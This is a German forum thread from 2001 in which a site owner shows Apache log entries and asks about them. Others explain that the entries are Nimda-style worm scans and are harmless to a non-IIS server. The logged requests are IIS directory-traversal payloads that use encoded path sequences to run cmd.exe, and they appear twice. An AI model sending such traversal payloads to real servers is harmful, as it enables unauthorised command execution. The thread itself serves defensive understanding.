[HaBo]

niedriger noob · 18.12.01, 19:07

Hi Leute,
Ich hab seit ein paar Tagen bei mir einen Webserver (Apache) unter Win200 laufen, und hab mir mal die Logdatei angeschaut. Bis auf einige Ausnahmen stehen auch ganz normale Sachen drinnen, wie z.B.
192.168.0.2 - - [18/Dec/2001:00:56:44 +0100] "GET /BIO/Ernaehrung/spurel.html HTTP/1.1" 200 1476

Aber dazwischen findet sich immer wieder:
62.107.27.236 - - [18/Dec/2001:16:53:13 +0100] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 325
62.107.27.236 - - [18/Dec/2001:16:53:13 +0100] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 325
62.107.27.236 - - [18/Dec/2001:16:53:14 +0100] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 341
62.107.27.236 - - [18/Dec/2001:16:53:14 +0100] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307
62.107.27.236 - - [18/Dec/2001:16:53:14 +0100] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307

Mich würde interressieren, was derjenige mit solchen Anfragen bezweckt? Gibt´s da irgendein Sicherheitsloch von dem ich wisen sollte?

thx im Vorraus
Noob

P.S.: Win2000 hat das neueste Service Pack, Apache Version ist 1.3.22

Indi · 18.12.01, 19:10

Nur mal so eine Idee:

62.107.27.236 ist nicht zufällig deine IP oder?

Anzeige

- Anzeige -

niedriger noob · 18.12.01, 19:24

Nein, meine ist 62.47.bla.bla

boppy · 18.12.01, 21:28

Ach, da solltest du dir echt keine sorgen machen. Diese attacken füllen knapp 80% meines LogFiles. Es muss sich um einen Virus handeln, der sowas versucht, denn es sind teilweise 4 Leute in der gleichen Sekunde dabei! Also: No Panic - if no M$!

) Nix neues also *fg*

niedriger noob · 18.12.01, 22:07

big tthhxx für die schnelle Hilfe.
War gut, dass ich diesmal nicht M$ Progs eingesetzt habe :] .
Gibt´s eine Liste, auf der ich nachsehen kann, für welche Exploits mein System noch anfällig ist?

mfg
Noob

**soox** · 18.12.01, 22:09

nimda und co lassen grüssen...in meinen log-files befindet sich ca 80% solche sch***

niedriger noob · 19.12.01, 22:14

Danke für die super Links, genau sowas habe ich gesucht

Anzeige

- Anzeige -

18.12.01, 19:07	#1 (permalink)
niedriger noob Registriert seit: 25.10.01 Likes: 0	Apache Webserver Logdatei Anzeige Hi Leute, Ich hab seit ein paar Tagen bei mir einen Webserver (Apache) unter Win200 laufen, und hab mir mal die Logdatei angeschaut. Bis auf einige Ausnahmen stehen auch ganz normale Sachen drinnen, wie z.B. 192.168.0.2 - - [18/Dec/2001:00:56:44 +0100] "GET /BIO/Ernaehrung/spurel.html HTTP/1.1" 200 1476 Aber dazwischen findet sich immer wieder: 62.107.27.236 - - [18/Dec/2001:16:53:13 +0100] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 325 62.107.27.236 - - [18/Dec/2001:16:53:13 +0100] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 325 62.107.27.236 - - [18/Dec/2001:16:53:14 +0100] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 341 62.107.27.236 - - [18/Dec/2001:16:53:14 +0100] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307 62.107.27.236 - - [18/Dec/2001:16:53:14 +0100] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307 Mich würde interressieren, was derjenige mit solchen Anfragen bezweckt? Gibt´s da irgendein Sicherheitsloch von dem ich wisen sollte? thx im Vorraus Noob P.S.: Win2000 hat das neueste Service Pack, Apache Version ist 1.3.22

Themen-Optionen
Druckbare Version zeigen Jemanden per E-Mail auf dieses Thema hinweisen
Ansicht
Linear-Darstellung Zur Hybrid-Darstellung wechseln Zur Baum-Darstellung wechseln

Ähnliche Themen
Thema	Autor	Forum	Antworten	Letzter Beitrag
APACHE Webserver Traffic und Bandbreite begrenzen	ba2	Webmaster-Security	11	07.12.07 04:00
Webserver für PHP	Stein	Code Kitchen	17	15.03.07 14:21
Webserver	Easyrider	Network · LAN, WAN, Firewalls	3	03.08.06 15:29
Apache dominiert Webserver	non	News & Ankündigungen	0	06.08.05 10:20
Apache Webserver...	keymaker	Windows	4	05.04.04 21:31

18.12.01, 19:10	#2 (permalink)
Indi Member of Honour Registriert seit: 02.10.01 Likes: 0	Nur mal so eine Idee: 62.107.27.236 ist nicht zufällig deine IP oder?

18.12.01, 19:24	#3 (permalink)
niedriger noob Themenstarter Registriert seit: 25.10.01 Likes: 0	Nein, meine ist 62.47.bla.bla

18.12.01, 21:28	#4 (permalink)
boppy Member of Honour Registriert seit: 20.10.01 Likes: 0	Ach, da solltest du dir echt keine sorgen machen. Diese attacken füllen knapp 80% meines LogFiles. Es muss sich um einen Virus handeln, der sowas versucht, denn es sind teilweise 4 Leute in der gleichen Sekunde dabei! Also: No Panic - if no M$! ) Nix neues also fg

18.12.01, 22:07	#5 (permalink)
niedriger noob Themenstarter Registriert seit: 25.10.01 Likes: 0	big tthhxx für die schnelle Hilfe. War gut, dass ich diesmal nicht M$ Progs eingesetzt habe :] . Gibt´s eine Liste, auf der ich nachsehen kann, für welche Exploits mein System noch anfällig ist? mfg Noob

18.12.01, 22:09	#6 (permalink)
soox Moderator Registriert seit: 17.10.01 Likes: 0	nimda und co lassen grüssen...in meinen log-files befindet sich ca 80% solche sch***

19.12.01, 22:14	#7 (permalink)
niedriger noob Themenstarter Registriert seit: 25.10.01 Likes: 0	Danke für die super Links, genau sowas habe ich gesucht

[HaBo]

Apache Webserver Logdatei